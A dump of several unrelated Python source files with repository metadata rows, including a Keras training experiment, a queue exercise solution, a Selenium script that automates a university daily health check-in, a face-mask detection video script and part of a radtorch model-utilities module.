    """ Custom callback that terminates training once `monitor` crosses `value`
    (e.g. stop as soon as val_loss reaches 0.05).  Adapted from:
    https://stackoverflow.com/questions/37293642/how-to-tell-keras-stop-training-based-on-loss-value
    """
    def __init__(self, monitor='val_loss', value=0.00001, stop_when_below=True, verbose=0):
        # BUGFIX: the original called super(Callback, self).__init__(), which
        # skips Callback's own initializer; initialize the direct parent.
        super(EarlyStoppingByMetric, self).__init__()
        self.monitor = monitor
        self.value = value
        self.verbose = verbose
        self.stop_when_below = stop_when_below
    def on_epoch_end(self, epoch, logs=None):
        # None-sentinel avoids the mutable default `logs={}` of the original.
        logs = logs or {}
        current = logs.get(self.monitor)
        if current is None:
            warnings.warn("Early stopping requires %s available!" % self.monitor, RuntimeWarning)
            # BUGFIX: without this return the comparisons below raised
            # TypeError (None vs float) right after the warning.
            return
        if self.stop_when_below:
            if current <= self.value:
                if self.verbose > 0:
                    print(f'Epoch {epoch:4d}: Early stopping, {self.monitor} threshold of {self.value}.')
                self.model.stop_training = True
                self.stopped_epoch = epoch
        else:
            if current >= self.value:
                if self.verbose > 0:
                    print(f'Epoch {epoch:4d}: Early stopping, {self.monitor} threshold of {self.value}.')
                self.model.stop_training = True
                self.stopped_epoch = epoch
# ---------------------------------------------------------------------------
# Continue training: for each warm-up epoch count (weps), load the warmed-up
# model and keep training until it reaches the relaxed reference score.
# ---------------------------------------------------------------------------
summary = {}
lg.logger.info('\n___ Iterate over weps ___')
for i, weps in enumerate(ep_vec):
    # Load warm model
    lg.logger.info(f'\nLoad warmed-up model with {weps} weps')
    modelpath = glob(str(wrmdir/'models'/f'*ep_{weps}-*.h5'))[0]
    model = load_model(modelpath, custom_objects={'r2_krs': r2_krs}) # https://github.com/keras-team/keras/issues/5916
    # Compute ref_metric of wrm model
    # lg.logger.info('Learning rate (wrm): {}'.format( K.eval(model.optimizer.lr)) )
    score_wrm = model.evaluate(xte, yte, verbose=0)
    # Pick the evaluate() entry whose position matches ref_metric's column in
    # the reference history csv — assumes matching column order; TODO confirm.
    score_wrm = score_wrm[ int(np.argwhere(h_ref.columns == ref_metric)) ]
    lg.logger.info('{} (wrm): {}'.format(ref_metric, score_wrm))
    # Reset learning rate to a new value
    lr_new = 0.0005
    model.compile(loss='mean_squared_error',
                  optimizer=SGD(lr=lr_new, momentum=0.9),
                  metrics=['mae', r2_krs])
    # Create outdir for a specific value of weps
    ep_dir = outdir/('weps_'+str(weps))
    os.makedirs(ep_dir, exist_ok=True)
    # Callbacks (custom)
    tr_iters = xtr.shape[0]/BATCH
    clr = CyclicLR(base_lr=base_clr, max_lr=max_clr, mode='triangular')
    early_stop_custom = EarlyStoppingByMetric(monitor=ref_metric, value=score_ref,
                                              stop_when_below=True, verbose=True)
    # Keras callbacks
    reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.75, patience=15, verbose=1, mode='auto',
                                  min_delta=0.0001, cooldown=3, min_lr=1e-9)
    # reduce_lr = ReduceLROnPlateau(monitor=ref_metric, factor=0.75, patience=10, verbose=1, mode='auto',
    #                               min_delta=0.0001, min_lr=1e-9)
    early_stop = EarlyStopping(monitor=ref_metric, patience=50, verbose=1, mode='auto')
    checkpointer = ModelCheckpoint(str(ep_dir/'model.h5'), verbose=0, save_weights_only=False, save_best_only=True)
    csv_logger = CSVLogger(ep_dir/f'krs_logger.log')
    # Callbacks list
    callback_list = [checkpointer, csv_logger, early_stop, reduce_lr]
    # NOTE(review): `opt_name` is never defined anywhere in this script, so
    # the next line raises NameError on the first loop iteration.  It looks
    # copied from a sibling script where opt_name named the optimizer (e.g.
    # 'sgd_clr'); define opt_name or remove/replace this guard — TODO confirm.
    if 'clr' in opt_name: callback_list = callback_list + [clr]
    # -----
    # Train
    # -----
    # fit_params
    fit_params = {'batch_size': BATCH, 'epochs': EPOCH, 'verbose': 1}
    fit_params['validation_data'] = (xte, yte)
    fit_params['callbacks'] = callback_list
    # Train model (continue phase)
    t0 = time()
    history = model.fit(xtr, ytr, **fit_params)
    runtime_ceps = time() - t0
    # Save keras history
    kh = ml_models.save_krs_history(history, ep_dir)
    # ----------------------------------
    # Results for the summary table/plot
    # ----------------------------------
    # Get ceps (number of continue-training epochs actually run)
    ceps = len(history.epoch)
    # Compute ref_metric of cnt model (last row of the saved history)
    score_cnt = kh.loc[len(kh)-1, ref_metric]
    lg.logger.info('{} (cnt): {}'.format( ref_metric, score_cnt ))
    #score_cnt = model.evaluate(xte, yte, verbose=0)
    #score_cnt = score_cnt[ int(np.argwhere(h_ref.columns == ref_metric)) ]
    # Bool that indicates if wrm model was converged to score_ref
    # TODO: this is correct for error (not R^2)
    converge = True if score_cnt <= score_ref else False
    # Update summary table
    summary[i] = (weps, ceps, score_wrm, score_cnt, runtime_ceps, converge)
    lg.logger.info('converge: {}'.format(converge))
    lg.logger.info('ceps: {} ({:.2f} mins)'.format( ceps, runtime_ceps/60 ))
    # ----------
    # Make plots
    # ----------
    # Plots
    plts_path = ep_dir/'plts'
    os.makedirs(plts_path, exist_ok=True)
    ml_models.plot_prfrm_metrics(history=history, title='Continue training',
                                 skp_ep=skp_ep, add_lr=True, outdir=plts_path)
    # Plot reference training with continue training
    for c in val_cols_names:
        fig, ax = plt.subplots(figsize=(8, 6))
        x1 = list(h_ref['epoch'])
        # Shift continue-training epochs by weps so the curves line up.
        x2 = list(kh['epoch'] + weps)
        ax.plot(x1, h_ref[c], 'b-', linewidth=1.5, alpha=0.7, label='ref')
        # ax.plot(x2, kh[c], 'ro-', markersize=2, alpha=0.7, label=f'weps_{weps}')
        ax.plot(x2, kh[c], 'r-', linewidth=1.5, alpha=0.7, label=f'weps_{weps}')
        if c == ref_metric:
            # x = range(0, max(x1+x2))
            # ymin = np.ones(len(x)) * min(h_ref[c])
            # yref = np.ones(len(x)) * score_ref
            # ax.plot(x, ymin, 'k--', linewidth=1, alpha=0.7, label='ref_min')
            # ax.plot(x, yref, 'g--', linewidth=1, alpha=0.7, label=f'ref_min_{prct_diff}%')
            # NOTE(review): axhline's 2nd positional arg is xmin (axes-coord
            # float), not a matplotlib format string; 'k--'/'g--' here likely
            # raises — use axhline(y, color='k', linestyle='--') — TODO fix.
            ax.axhline(min(h_ref[c]), 'k--', linewidth=1, alpha=0.7, label='ref_min')
            ax.axhline(score_ref, 'g--', linewidth=1, alpha=0.7, label=f'ref_min_{prct_diff}%')
        ax.set_xlabel('epoch')
        ax.set_ylabel(c)
        plt.title(f'ceps: {ceps}')
        plt.legend(loc='best')
        plt.grid(True)
        plt.savefig(ep_dir/f'ref_vs_cnt_({c}).png', bbox_inches='tight')
        del fig, ax
lg.logger.info('\n' + '_'*70)
# Assemble and persist the summary table (one row per weps value).
columns = ['weps', 'ceps', f'{ref_metric}_wrm', f'{ref_metric}_cnt', 'runtime_sec', 'converge']
summary = pd.DataFrame.from_dict(summary, orient='index', columns=columns)
summary.to_csv(outdir/'summary.csv', index=False)
lg.logger.info(summary)
# Final plot
fig, ax1 = plt.subplots()
# Add ceps plot
ax1.plot(summary['weps'], summary['ceps'], '-ob')
ax1.set_xlabel('weps')
ax1.set_ylabel('ceps', color='b')
ax1.tick_params('y', colors='b')
ax1.grid(True)
# Add runtime plot
# ax2 = ax1.twinx()
# ax2.plot(summary['weps'], summary['runtime_sec'], '-om')
# ax2.set_ylabel('runtime', color='m')
# ax2.tick_params('y', colors='m')
fig.tight_layout()
# plt.title('Reference {} at {} epoch'.format(ref_metric, ref_ep))
# plt.title(f'Ref epochs: {ref_ep}; Diff from min score: {prct_diff}%')
plt.title(f'Diff from min score: {prct_diff}%')
plt.savefig(outdir/'summary_plot.png', bbox_inches='tight')
lg.logger.info('\nMax speed-up: {}/{}={:.2f}'.format( ref_ep, summary['ceps'].min(), ref_ep/summary['ceps'].min()) )
lg.logger.info('Max epochs reduced: {}-{}={}'.format( ref_ep, summary['ceps'].min(), ref_ep-summary['ceps'].min()) )
lg.logger.info('\nProgram runtime: {:.2f} mins'.format( (time() - t_start)/60 ))
lg.logger.info('Done.')
| [
"apartin@lambda-quad.cels.anl.gov"
] | apartin@lambda-quad.cels.anl.gov |
236b27551e02af95c808dc72d6db595e4fba42b8 | 80352272be7b7806e592ed35e59920845d9adb69 | /BOJ-10845.py | 929abbf2859e8a5868ce67921c920821ec3edede | [] | no_license | songda515/algorithm | 14635609df9efc7e4aa396df7309b0eebae331b5 | fc64e6115088ac52d83b93129da6ec0efac1874f | refs/heads/master | 2023-04-13T22:22:39.284686 | 2021-04-21T09:34:53 | 2021-04-21T09:34:53 | 337,151,557 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 664 | py | from sys import stdin
# BOJ 10845 (queue): process n commands (push/pop/size/empty/front/back)
# read from stdin, printing one result per query command.
from sys import stdin
from collections import deque

input = stdin.readline  # fast line reader (intentionally shadows the builtin)

n = int(input())
# PERF: deque gives O(1) popleft; the original list.pop(0) was O(n) per pop.
queue = deque()
for _ in range(n):
    command = input().strip()
    if command == 'pop':
        # Remove and print the front element, or -1 if the queue is empty.
        print(queue.popleft() if queue else -1)
    elif command == 'size':
        print(len(queue))
    elif command == 'empty':
        print(0 if queue else 1)
    elif command == 'front':
        print(queue[0] if queue else -1)
    elif command == 'back':
        print(queue[-1] if queue else -1)
    else:
        # 'push X': store X (kept as a string; it is only ever printed back).
        queue.append(command.split()[-1])
"songda515@gmail.com"
] | songda515@gmail.com |
d67dac80927b5d7deb7ec474c16d1403bc5bd4a9 | f877e8617f6ac8b5c742ebec1770b36065a74189 | /build/assignment_04/catkin_generated/pkg.installspace.context.pc.py | b085dfd7a6ae81ad86f1052d7b475b370e120dc6 | [] | no_license | bolduc-drew/AUE893_Bolduc | 3869e793da11e73bd8e9f113a055e53920d94cf8 | f05d44266e918eb455085b8648367eef517df2c5 | refs/heads/master | 2021-01-25T05:56:44.619906 | 2017-04-27T21:01:11 | 2017-04-27T21:01:11 | 80,707,652 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 381 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "assignment_04"
PROJECT_SPACE_DIR = "/home/bolduc/AUE893_Bolduc/install"
PROJECT_VERSION = "0.0.0"
| [
"abolduc@g.clemson.edu"
] | abolduc@g.clemson.edu |
884168216b4d61ff82fc3872da8789d20fad0f33 | 7fcde04f3bae3430085d5909f274ef670591a04e | /pluto_drone/plutodrone/src/pd.py | 4dd2f7445c5723ebf61108e03e1e5bad662cf9cb | [] | no_license | sjoshi13/Hungry-Bird-eYRC-2018- | ddbf7f264ade40bbb7af01242c75270df6a7a475 | 2e5c6c7d7c9fe12488dcfcbcf155d624554ef5cd | refs/heads/master | 2020-05-03T22:59:49.804532 | 2019-04-01T12:11:54 | 2019-04-01T12:11:54 | 178,854,820 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 57 | py | import csv
# Tiny smoke-test script: print a marker, open the CSV, print a second marker.
print(5)
# BUGFIX: the original opened 'j.csv' and leaked the handle; a context
# manager guarantees it is closed.
with open('j.csv', 'r') as f:
    pass
print('shruti')
| [
"shruti03.joshi@gmail.com"
] | shruti03.joshi@gmail.com |
d348351ef092461e7fb46671aa00975b45ff828d | 67f858f723d9114462467ad15811d321c369a5a1 | /jksb.py | 276478d63e9e3e1d0385991d9e4b12371d63f579 | [] | no_license | xiaozixiaopingzi/zzu-jksb | 280097965d2bc4e8ed654a7de95b417abfce8322 | 66f9b2b3faef8a6e0ae4730fc7b99880bbcce64a | refs/heads/master | 2022-11-20T11:29:38.710409 | 2020-07-27T16:55:35 | 2020-07-27T16:55:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,969 | py | #encoding:UTF-8
from selenium import webdriver
from selenium.webdriver.support.wait import WebDriverWait as wait
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support import expected_conditions as ec
from selenium.common.exceptions import TimeoutException
from selenium.common.exceptions import SessionNotCreatedException
from selenium.webdriver.support.select import Select
import sys
import os
import requests
import time
import re
def Wechat(title, content):
    """Push a notification through the ServerChan (sc.ftqq.com) WeChat bridge.

    title   -- short message title (ServerChan "text" field).
    content -- message body (ServerChan "desp" field, markdown supported).

    The ServerChan key is read from the environment variable "api".
    """
    api = "https://sc.ftqq.com/" + os.environ["api"] + ".send"
    data = {
        "text" : title,
        "desp" : content
    }
    # Bound the request so a hung endpoint cannot stall the check-in flow;
    # the response body is not used, so it is not kept.
    requests.post(api, data=data, timeout=30)
class Log:
    """Automates the ZZU daily health check-in (jksb.zzu.edu.cn) with a
    headless mobile-emulating Chrome driver, retrying up to 3 times and
    reporting the outcome via Wechat()."""
    def __init__(self):
        # Portal credentials come from the environment; self.i counts attempts.
        self.uid = os.environ["username"]
        self.pwd = os.environ["password"]
        self.i = 1
        #self.fp = open(r"C:\today.txt", 'a+', encoding='utf8')
    def login(self):
        """Log in, submit today's health report if not yet filed, and verify
        the confirmation text.  On timeout/driver failure, retries recursively
        up to 3 total attempts before reporting failure."""
        try:
            # Emulate a mobile device so the site serves its mobile layout.
            mobile = {"deviceName":"iPhone X"}
            option = webdriver.ChromeOptions()
            option.add_experimental_option('mobileEmulation', mobile)
            option.add_argument('--disable-infobars')
            option.add_argument("--disable-extensions")
            option.add_argument("--disable-gpu")
            option.add_argument("--disable-dev-shm-usage")
            option.add_argument("--no-sandbox")
            option.add_argument("--headless")
            # If chromedriver is on PATH, no absolute path is needed here.
            wd = webdriver.Chrome(chrome_options=option)
            wd.set_window_size(600 , 800)
            wd.get("http://jksb.zzu.edu.cn/")
            wd.switch_to.frame(0)
            try:
                # Fill the login form (uid/upw) and submit.
                wait(wd , 10 ,poll_frequency=0.5).until(ec.presence_of_element_located((By.NAME , 'uid'))).send_keys(self.uid)
                time.sleep(0.5)
                wait(wd , 10, poll_frequency=0.5).until(ec.visibility_of_element_located((By.NAME , "upw"))).send_keys(self.pwd)
                time.sleep(0.5)
                wait(wd , 10 , poll_frequency=0.5).until(ec.element_to_be_clickable((By.XPATH,".//div[@class='mt_3e']/input"))).submit()
                time.sleep(0.5)
                # wd.switch_to.frame('zzj_top_6s')
                # time.sleep(0.5)
            except TimeoutException :
                raise TimeoutError
            # Switch into the report frame.
            wd.switch_to.frame('zzj_top_6s')
            time.sleep(0.5)
            # Status banner text tells us whether today's report already exists.
            init = wait(wd , 10 ,poll_frequency=0.5).until(ec.presence_of_element_located((By.XPATH , '//*[@id="bak_0"]/div[7]/span')))
            init_text = init.text
            if '已经填报' in init_text:
                # Already reported today: nothing to do.
                # if '1' in init_text:
                #self.fp.writelines(u"{} --> 打卡成功 -->已填报过了 无需重复填写 ^_^ \n ".format(time.strftime("%Y-%m-%d %H : %M: %S", time.localtime())))
                print(u"{} 已完成上报啦 ,无需重复啦 ^_^ ".format(time.strftime("%Y-%m-%d %H : %M: %S", time.localtime())))
                time.sleep(5)
                sys.exit()
            else:
                # Click through the report form and submit it.
                wait(wd ,10 ,poll_frequency=1).until(ec.element_to_be_clickable((By.XPATH , '//*[@id="bak_0"]/div[13]/div[3]/div[4]'))).click()
                # Select(wd.find_element_by_xpath('//*[@id="bak_0"]/div[8]/select')).select_by_value("正常")
                # wait(wd, 10, poll_frequency=0.5).until(ec.element_to_be_clickable((By.XPATH, '//*[@id="bak_0"]/div[13]/div[4]/span'))).click()
                wait(wd, 10, poll_frequency=0.5).until(ec.element_to_be_clickable((By.XPATH, '//*[@id="bak_0"]/div[19]/div[4]/span'))).click()
                # notis = wd.find_element_by_xpath('//*[@id="bak_0"]/div[2]/div[2]/div[2]/div[2]').text
                notis = wd.find_element_by_xpath('//*[@id="bak_0"]/div[2]').text
                # The page thanks the user on success; match that phrase.
                # pattern = re.compile(r"感谢您向学校上报健康状况")
                pattern = re.compile(r"感谢你今日上报健康状况!")
                confirm = re.findall(pattern, notis)#
                if confirm :
                    today = "{} --> 打卡成功 --> ^_^\n".format(str(time.strftime(u"%Y-%m-%d %H : %M: %S", time.localtime())))
                    print(today)
                    Wechat("打卡成功",today)
                    #self.fp.writelines(today)
                    time.sleep(3)
                else:
                    # Confirmation text missing: treat as failure and retry.
                    raise TimeoutError
                # wd.quit()
        except (TimeoutError,SessionNotCreatedException):
            # Retry loop: each failed attempt recurses into login(); after the
            # nested call returns, the while re-checks the attempt counter.
            # NOTE(review): recursion inside the loop makes the control flow
            # hard to follow; a plain loop around the whole body would be
            # simpler — TODO consider refactoring.
            while 1:
                if self.i <= 3:
                    error = u"{} --> 打卡失败 --> 已进行第{}次重试 (┬_┬) \n".format(str(time.strftime(u"%Y-%m-%d %H : %M: %S", time.localtime())) , str(self.i))
                    #self.fp.writelines(error)
                    print(error)
                    self.i+=1
                    try:
                        # wd.close()
                        wd.quit()
                    except:
                        pass
                    time.sleep(4)
                    self.login()
                else:
                    error2 = u"{} --> 打卡失败 --> 已尝试{}次且未成功 , 打卡失败请重试!! (┬_┬) \n".format(str(time.strftime(u"%Y-%m-%d %H : %M: %S", time.localtime())) , str(self.i))
                    #self.fp.writelines(error2)
                    print(error2)
                    Wechat("打卡失败",error2)
                    break
        finally:
            # Always try to tear the driver down (wd may be unbound if Chrome
            # never started; the bare except swallows that).
            try:
                wd.quit()
            except:
                pass
            #self.fp.close()
if __name__ == "__main__":
    # Script entry point: run one check-in attempt.
    Log().login()
| [
"noreply@github.com"
] | xiaozixiaopingzi.noreply@github.com |
238bcfb1c6807d7ec0bef0ae67ea5120c805ac69 | 14ad9a1dc0d0c8529a856baf3456e597c19319b0 | /video.py | 26d012ab317c30401d22af65461baca1e2a72bb9 | [] | no_license | isp5708/hackerTone_ABC | 6ffdc43692842142fbaa18bd79d8d73132d4d149 | 86d5df147963d094ec36ebd20ca06697b88b077b | refs/heads/master | 2023-01-23T01:57:46.609486 | 2020-11-19T10:54:07 | 2020-11-19T10:54:07 | 314,190,663 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,101 | py | from tensorflow.keras.applications.mobilenet_v2 import preprocess_input
from tensorflow.keras.models import load_model
import numpy as np
import cv2
import matplotlib.pyplot as plt
import os
# Face-mask detection over a video file: detect faces with an SSD face
# detector, classify each crop with a MobileNetV2 mask model, draw the
# results, and write the annotated video to output.mp4.
facenet = cv2.dnn.readNet('models/deploy.prototxt', 'models/res10_300x300_ssd_iter_140000.caffemodel')
model = load_model('models/mask_detector.model')

# First frame is read only to size the output writer.
# NOTE(review): cap.read() is not checked here; a missing/corrupt video makes
# img None and img.shape raise — TODO confirm input always exists.
cap = cv2.VideoCapture('models/hihi.mp4')
ret, img = cap.read()

fourcc = cv2.VideoWriter_fourcc('m', 'p', '4', 'v')
out = cv2.VideoWriter('output.mp4', fourcc, cap.get(cv2.CAP_PROP_FPS), (img.shape[1], img.shape[0]))

while cap.isOpened():
    ret, img = cap.read()
    if not ret:
        break

    h, w = img.shape[:2]
    # SSD face detection on the full frame.
    blob = cv2.dnn.blobFromImage(img, scalefactor=1., size=(300, 300), mean=(104., 177., 123.))
    facenet.setInput(blob)
    dets = facenet.forward()

    result_img = img.copy()

    for i in range(dets.shape[2]):
        confidence = dets[0, 0, i, 2]
        if confidence < 0.5:
            continue

        # Face bounding box in pixel coordinates.
        x1 = int(dets[0, 0, i, 3] * w)
        y1 = int(dets[0, 0, i, 4] * h)
        x2 = int(dets[0, 0, i, 5] * w)
        y2 = int(dets[0, 0, i, 6] * h)

        # Preprocess the face crop for the MobileNetV2 classifier.
        face = img[y1:y2, x1:x2]
        face_input = cv2.resize(face, dsize=(224, 224))
        face_input = cv2.cvtColor(face_input, cv2.COLOR_BGR2RGB)
        face_input = preprocess_input(face_input)
        face_input = np.expand_dims(face_input, axis=0)

        mask, nomask = model.predict(face_input).squeeze()

        if mask > 0.9:
            color = (0, 255, 0)
            label = 'Mask %d%%' % (mask * 100)
        elif nomask > 0.9:
            color = (0, 0, 255)
            label = 'No Mask %d%%' % (nomask * 100)
        else:
            # BUGFIX: previously neither branch ran for an uncertain face, so
            # `color`/`label` were stale from the previous face (or unbound on
            # the very first one, raising NameError).  Skip drawing instead.
            continue

        cv2.rectangle(result_img, pt1=(x1, y1), pt2=(x2, y2), thickness=2, color=color, lineType=cv2.LINE_AA)
        cv2.putText(result_img, text=label, org=(x1, y1 - 10), fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=0.8,
                    color=color, thickness=2, lineType=cv2.LINE_AA)

    out.write(result_img)
    cv2.imshow('result', result_img)
    if cv2.waitKey(1) == ord('q'):
        break

out.release()
cap.release()
| [
"dlwnsdud3737@naver.com"
] | dlwnsdud3737@naver.com |
cce8b4daf14e7d369b29433a23c878b1b5cfccc6 | 5a84db9a25bfaab6f70bbe92464ee2cd6a6fc523 | /radtorch/modelsutils.py | eafa725b96a42e8dc11f996eab77977bddc79120 | [
"MIT"
] | permissive | kareemelfatairy/radtorch | 712424e6a95d29aa5ca388e2e499389b995e228a | 539d8accdc405a94e2ed3c0c770c8341de00ee05 | refs/heads/master | 2021-01-13T18:02:38.368814 | 2020-02-22T23:54:26 | 2020-02-22T23:54:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,792 | py | import torch, torchvision, datetime, time, pickle, pydicom, os
import torchvision.models as models
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import torchvision.datasets as datasets
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from sklearn import metrics
from tqdm import tqdm_notebook as tqdm
from torch.utils.data.dataset import Dataset
from torchvision import transforms
from PIL import Image
from pathlib import Path
from radtorch.dicomutils import dicom_to_pil
# Per-architecture metadata: expected input image size and the width of the
# feature vector feeding the final classifier layer.
# NOTE(review): 'input_size': 244 is probably a typo for 224 (standard
# ImageNet input) — confirm before relying on this field.
model_dict = {'vgg16':{'name':'vgg16','input_size':244, 'output_features':4096},
              'vgg19':{'name':'vgg19','input_size':244, 'output_features':4096},
              'resnet50':{'name':'resnet50','input_size':244, 'output_features':2048},
              'resnet101':{'name':'resnet101','input_size':244, 'output_features':2048},
              'resnet152':{'name':'resnet152','input_size':244, 'output_features':2048},
              'wide_resnet50_2':{'name':'wide_resnet50_2','input_size':244, 'output_features':2048},
              'wide_resnet101_2':{'name':'wide_resnet101_2','input_size':244, 'output_features':2048},
              }

# Loss functions selectable by name.  NOTE: these are shared instances, not
# factories — every caller receives the same object.
loss_dict = {
    'NLLLoss':torch.nn.NLLLoss(),
    'CrossEntropyLoss':torch.nn.CrossEntropyLoss(),
    'MSELoss':torch.nn.MSELoss(),
    'PoissonNLLLoss': torch.nn.PoissonNLLLoss(),
    'BCELoss': torch.nn.BCELoss(),
    'BCEWithLogitsLoss': torch.nn.BCEWithLogitsLoss(),
    'MultiLabelMarginLoss':torch.nn.MultiLabelMarginLoss(),
    'SoftMarginLoss':torch.nn.SoftMarginLoss(),
    'MultiLabelSoftMarginLoss':torch.nn.MultiLabelSoftMarginLoss(),
    }

# Names of the supported architectures / losses (dict iteration order).
supported_models = list(model_dict)
supported_losses = list(loss_dict)


def supported_list():
    '''
    Prints the currently supported network architectures and loss functions
    to stdout and returns None.

    (Doc fix: the previous docstring incorrectly claimed a list was returned.)
    '''
    print ('Supported Network Architectures:')
    for i in supported_models:
        print (i)
    print('')
    print ('Supported Loss Functions:')
    for i in supported_losses:
        print (i)
class Identity(nn.Module):
    """Pass-through module: forward() returns its input unchanged.

    Useful for replacing (i.e. disabling) a layer in a pretrained network.
    """
    def __init__(self):
        super().__init__()

    def forward(self, x):
        """Return *x* untouched."""
        return x
def create_model(model_arch, input_channels, output_classes, pre_trained=True):
    '''
    Creates a PyTorch neural network with the specified architecture, adapted
    to the requested number of input channels and output classes.

    Inputs:
        model_arch: [str] architecture name, e.g. 'vgg16', 'resnet50', 'resnet152'.
        input_channels: [int] number of input image channels (grayscale DICOM
                        images usually have 1, color images 3).
        output_classes: [int] number of classification output classes.
        pre_trained: [boolean] load pretrained ImageNet weights (default=True).

    Outputs:
        Output: [PyTorch neural network object], or None (after printing an
        error) when model_arch is not supported.

    Examples:
    ```
    my_model = radtorch.modelsutils.create_model(model_arch='vgg16',
                                                 input_channels=1,
                                                 output_classes=2,
                                                 pre_trained=True)
    ```
    '''
    if model_arch not in supported_models:
        print ('Error! Provided model architecture is not supported yet. For complete list of supported models please type radtorch.modelsutils.model_list()')
        return None
    # Every supported architecture name matches a constructor on
    # torchvision.models, so dispatch by name instead of a long if/elif chain.
    train_model = getattr(torchvision.models, model_arch)(pretrained=pre_trained)
    if model_arch.startswith('vgg'):
        # Adapt the first conv to input_channels and the final classifier
        # layer to output_classes.
        train_model.features[0] = nn.Conv2d(input_channels,64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
        train_model.classifier[6] = nn.Sequential(
            nn.Linear(in_features=4096, out_features=output_classes, bias=True))
    else:
        # ResNet / Wide-ResNet family: swap the stem conv and the fc head.
        train_model.conv1 = nn.Conv2d(input_channels,64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)
        fc_inputs = train_model.fc.in_features
        train_model.fc = nn.Sequential(
            nn.Linear(fc_inputs, output_classes))
    return train_model
def create_loss_function(type):
    '''
    Creates a PyTorch training loss function object.

    Inputs:
        type: [str] name of the loss function, e.g. 'CrossEntropyLoss'.

    Outputs:
        Output: [PyTorch loss function object] the shared instance from
        loss_dict, or None (after printing an error) for unsupported names.
    '''
    if type in supported_losses:
        return loss_dict[type]
    print ('Error! Provided loss function is not supported yet. For complete list of supported models please type radtorch.modelsutils.supported_list()')
def train_model(model, train_data_loader, valid_data_loader, train_data_set, valid_data_set,loss_criterion, optimizer, epochs, device):
    '''
    Trains a neural network model and tracks per-epoch loss/accuracy.

    Inputs:
        model: [PyTorch neural network object] Model to be trained.
        train_data_loader: [PyTorch dataloader object] training data dataloader.
        valid_data_loader: [PyTorch dataloader object] validation data dataloader.
        train_data_set: [PyTorch dataset object] training dataset (used only for len()).
        valid_data_set: [PyTorch dataset object] validation dataset (used only for len()).
        loss_criterion: [PyTorch nn object] Loss function to be used during training.
        optimizer: [PyTorch optimizer object] Optimizer to be used during training.
        epochs: [int] number of training epochs.
        device: [str] device to train on, 'cpu' or 'cuda'.

    Outputs:
        model: [PyTorch neural network object] trained model.
        training_metrics: [list] one [train_loss, valid_loss, train_acc, valid_acc]
                          entry per epoch.
    '''
    start_time = datetime.datetime.now()
    training_metrics = []
    print ('Starting training at '+ str(start_time))
    model = model.to(device)
    for epoch in tqdm(range(epochs)):
        epoch_start = time.time()
        # Set to training mode
        model.train()
        # Loss and Accuracy within the epoch
        train_loss = 0.0
        train_acc = 0.0
        valid_loss = 0.0
        valid_acc = 0.0
        for i, (inputs, labels) in enumerate(train_data_loader):
            # inputs = inputs.float()
            inputs = inputs.to(device)
            labels = labels.to(device)
            # Clean existing gradients
            optimizer.zero_grad()
            # Forward pass - compute outputs on input data using the model
            outputs = model(inputs)
            # Compute loss
            loss = loss_criterion(outputs, labels)
            # Backpropagate the gradients
            loss.backward()
            # Update the parameters
            optimizer.step()
            # Compute the total loss for the batch and add it to train_loss
            # (weighted by batch size so the per-sample average below is exact)
            train_loss += loss.item() * inputs.size(0)
            # Compute the accuracy
            ret, predictions = torch.max(outputs.data, 1)
            correct_counts = predictions.eq(labels.data.view_as(predictions))
            # Convert correct_counts to float and then compute the mean
            acc = torch.mean(correct_counts.type(torch.FloatTensor))
            # Compute total accuracy in the whole batch and add to train_acc
            train_acc += acc.item() * inputs.size(0)
            # print("Batch number: {:03d}, Training: Loss: {:.4f}, Accuracy: {:.4f}".format(i, loss.item(), acc.item()))
        # Validation - No gradient tracking needed
        with torch.no_grad():
            # Set to evaluation mode
            model.eval()
            # Validation loop
            for j, (inputs, labels) in enumerate(valid_data_loader):
                inputs = inputs.to(device)
                labels = labels.to(device)
                # Forward pass - compute outputs on input data using the model
                outputs = model(inputs)
                # Compute loss
                loss = loss_criterion(outputs, labels)
                # Compute the total loss for the batch and add it to valid_loss
                valid_loss += loss.item() * inputs.size(0)
                # Calculate validation accuracy
                ret, predictions = torch.max(outputs.data, 1)
                correct_counts = predictions.eq(labels.data.view_as(predictions))
                # Convert correct_counts to float and then compute the mean
                acc = torch.mean(correct_counts.type(torch.FloatTensor))
                # Compute total accuracy in the whole batch and add to valid_acc
                valid_acc += acc.item() * inputs.size(0)
                #print("Validation Batch number: {:03d}, Validation: Loss: {:.4f}, Accuracy: {:.4f}".format(j, loss.item(), acc.item()))
        # Find average training loss and training accuracy
        # (per-sample averages: weighted sums above divided by dataset size)
        avg_train_loss = train_loss/len(train_data_set)
        avg_train_acc = train_acc/len(train_data_set)
        # Find average validation loss and training accuracy
        avg_valid_loss = valid_loss/len(valid_data_set)
        avg_valid_acc = valid_acc/len(valid_data_set)
        training_metrics.append([avg_train_loss, avg_valid_loss, avg_train_acc, avg_valid_acc])
        epoch_end = time.time()
        print("Epoch : {:03d}/{} : [Training: Loss: {:.4f}, Accuracy: {:.4f}%] [Validation : Loss : {:.4f}, Accuracy: {:.4f}%] [Time: {:.4f}s]".format(epoch, epochs, avg_train_loss, avg_train_acc*100, avg_valid_loss, avg_valid_acc*100, epoch_end-epoch_start))
    end_time = datetime.datetime.now()
    total_training_time = end_time-start_time
    print ('Total training time = '+ str(total_training_time))
    return model, training_metrics
def model_inference(model, input_image_path, trans=transforms.Compose([transforms.ToTensor()])):
    '''
    Performs Inference on a selected image using a trained model.
    Inputs:
        model: [PyTorch Model] Trained neural network.
        input_image_path: [str] path to target DICOM (.dcm) or standard image file.
